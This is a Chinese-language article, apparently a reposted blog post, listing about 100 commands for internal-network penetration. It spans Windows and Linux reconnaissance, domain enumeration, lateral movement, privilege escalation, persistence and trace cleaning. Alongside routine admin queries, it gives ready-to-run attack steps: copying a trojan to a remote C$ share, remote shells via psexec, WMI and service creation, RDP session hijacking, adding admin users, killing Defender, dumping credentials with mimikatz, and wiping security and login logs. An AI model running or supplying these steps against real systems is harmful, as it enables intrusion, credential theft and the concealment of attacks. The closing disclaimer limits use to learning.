内网渗透测试100条命令大全!
内网渗透是攻防演练与渗透测试的核心环节,信息收集、权限判断、横向移动、权限维持、痕迹清理每一步都依赖原生系统命令完成。本文按Windows内网命令、Linux内网命令、域环境命令、通用内网探测、文件操作、进程服务、痕迹清理七大实战场景,整理100条高频可用命令,供参考学习。
一、Windows 内网基础信息收集
- 1. whoami —— 查看当前登录用户
- 2. whoami /priv —— 查看当前用户权限列表(提权关键依据)
- 3. whoami /all —— 查看用户SID、组、权限完整信息
- 4. hostname —— 查看主机名
- 5. systeminfo —— 系统版本、补丁、架构、域信息
- 6. systeminfo | findstr KB —— 快速列出已打补丁
- 7. ipconfig /all —— 网卡、IP、网关、DNS、是否入域
- 8. ipconfig /displaydns —— 查看本地DNS缓存
- 9. ipconfig /flushdns —— 清空DNS缓存
- 10. arp -a —— 内网ARP表,查看同网段存活主机
- 11. route print —— 路由表,判断多网卡、内网网段
- 12. netstat -ano —— 查看所有端口、连接、对应PID
- 13. netstat -ano | findstr ":3389" —— 筛选远程桌面端口状态
- 14. net user —— 列出本地用户
- 15. net localgroup —— 列出本地用户组
- 16. net localgroup administrators —— 查看本地管理员
- 17. net config workstation —— 快速判断是否入域
- 18. ver —— 快速查看系统版本
- 19. wmic os get caption —— 纯净输出系统版本
- 20. wmic qfe list —— 补丁列表(比systeminfo更干净)
二、Windows 内网探测与端口扫描
- 1. ping -n 1 -w 100 192.168.1.1 —— 单发ping,快速探测存活
- 2. for /L %i in (1,1,254) do @ping -n 1 -w 100 192.168.1.%i | findstr TTL —— 原生C段存活扫描
- 3. tracert -d 目标IP —— 路由追踪(不解析域名,更快)
- 4. net view —— 查看内网同工作组主机
- 5. net view /domain —— 查看内网存在的域
- 6. net share —— 查看本机开放共享
- 7. dir \\127.0.0.1\C$ —— 测试默认管理共享(C /ADMIN$)
- 8. sc query —— 列出所有运行服务
- 9. sc query winrm —— 检查WinRM远程管理状态
- 10. sc query termservice —— 检查远程桌面服务状态
- 11. tasklist /svc —— 进程+对应服务名
- 12. tasklist | findstr lsass.exe —— 定位lsass进程PID
三、Windows 横向移动与远程执行
- 1. net use \\IP\ipc$ "密码" /user:用户名 —— IPC$连接
- 2. net use \\IP\C$ /user:域\用户名 密码 —— 挂载远程C盘
- 3. copy 木马.exe \\IP\C$\Windows\Temp —— 远程文件上传
- 4. psexec \\IP -u 用户名 -p 密码 cmd —— 远程获取Shell(需要管理员)
- 5. wmic /node:IP /user:用户 /password:密码 process call create "cmd.exe" —— WMI远程执行
- 6. sc \\IP create 服务名 binPath= "cmd.exe /c 命令" —— SC远程创建服务执行命令
- 7. schtasks /create /s IP /u 用户 /p 密码 /tn 任务名 /tr 命令 /sc once /st 00:00 —— 计划任务远程执行
- 8. qwinsta /server:IP —— 查看远程主机登录会话
- 9. tscon 会话ID /dest:console /server:IP —— 远程桌面会话劫持
- 10. reg query \\IP\HKLM\SYSTEM —— 远程读取注册表
- 11. net start /domain —— 查看域内启动的服务
- 12. winrm quickconfig —— 本机快速开启WinRM
- 13. Enter-PSSession -Computer IP —— PowerShell远程连接
四、Windows 权限提升与凭据获取
- 1. wmic product get name,version —— 查看安装软件(寻找可提权程序)
- 2. wmic service get name,startname —— 查看服务启动账户
- 3. icacls c:\windows\system32 —— 查看目录权限配置
- 4. secedit /export /cfg c:\sec.cfg —— 导出本机安全策略
- 5. net user 用户名 密码 /add —— 添加本地用户
- 6. net localgroup administrators 用户名 /add —— 加入本地管理员
- 7. net localgroup "Remote Desktop Users" 用户名 /add —— 开通远程桌面权限
- 8. reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f —— 开启3389
- 9. taskkill /f /im msmpeng.exe —— 强制结束Defender(需管理员)
- 10. mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit —— 读取内存凭据(合法授权使用)
五、Windows 域环境渗透命令
- 1. net time /domain —— 获取域控时间,定位域控IP
- 2. nltest /dclist:域名 —— 列出域控制器
- 3. nltest /dsgetdc:域名 —— 获取域控信息
- 4. net user /domain —— 列出域内所有用户
- 5. net group /domain —— 列出域内所有组
- 6. net group "Domain Admins" /domain —— 域管理员列表
- 7. net group "Enterprise Admins" /domain —— 企业管理员
- 8. net group "Domain Computers" /domain —— 域内机器
- 9. dsquery user —— 查询域用户(域管环境)
- 10. dsquery computer —— 查询域内机器
- 11. dsquery group —— 查询域内用户组
- 12. set user —— 快速查看USERDOMAIN判断域环境
- 13. gpresult /r —— 查看域策略
- 14. wmic ntdomain list full —— 获取域信息
- 15. nslookup -type=SRV _ldap._tcp —— LDAP服务定位域控
六、Linux 内网渗透命令
- 1. id —— 当前用户UID/GID/权限
- 2. whoami —— 当前用户
- 3. uname -a —— 内核版本(提权关键)
- 4. cat /etc/issue —— 系统版本
- 5. cat /etc/passwd —— 本地用户
- 6. cat /etc/group —— 本地组
- 7. ifconfig 或 ip a —— 网卡IP信息
- 8. route -n —— 路由表
- 9. arp -a —— ARP缓存
- 10. netstat -antlp —— 端口与进程
- 11. ps -ef —— 进程列表
- 12. find / -perm -u=s -type f 2>/dev/null —— 查找SUID提权文件
- 13. sudo -l —— 查看sudo权限
- 14. cat /etc/shadow —— 密码哈希(需root)
- 15. ssh user@IP —— 内网SSH横向
七、内网通用:文件搜索、痕迹清理、权限维持
- 1. dir /s /b c:*.txt | findstr password —— Windows搜索含密码文件
- 2. find / -name "*.conf" -type f 2>/dev/null —— Linux搜索配置文件
- 3. find / -name "*.bak" -o -name "*.old" —— 搜索备份文件
- 4. del /f /s /q %windir%\prefetch* —— 清理预读取文件
- 5. del /f /s /q "%userprofile%\Recent*" —— 清理最近访问记录
- 6. cls —— 清空CMD屏幕
- 7. history -c —— Linux清空历史
- 8. echo > /var/log/wtmp —— 清空登录日志(Linux)
- 9. echo > /var/log/secure —— 清空SSH日志(Linux)
- 10. schtasks /create /tn 名称 /tr 路径 /sc onstart /ru system —— 开机启动维持权限
- 11. reg add HKLM...\Run /v 名称 /t REG_SZ /d 路径 /f —— 注册表自启动
- 12. at 12:00 shutdown /r /t 0 —— 定时重启(测试用)
- 13. wevtutil el —— 列出Windows日志
- 14. wevtutil cl System —— 清空系统日志
- 15. wevtutil cl Security —— 清空安全日志
文章来源:HACK之道
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END

华盟君